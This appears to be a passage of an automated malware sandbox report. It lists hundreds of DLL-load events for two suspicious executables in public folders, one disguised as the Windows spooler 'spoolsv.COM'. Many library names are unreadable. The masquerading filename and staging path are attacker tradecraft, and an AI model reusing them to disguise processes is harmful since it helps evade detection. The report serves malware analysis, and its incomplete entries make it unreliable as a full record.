              Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: url.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: userenv.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: winmm.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: wininet.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: wldp.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: profapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMSection loaded: amsi.dllJump to behavior
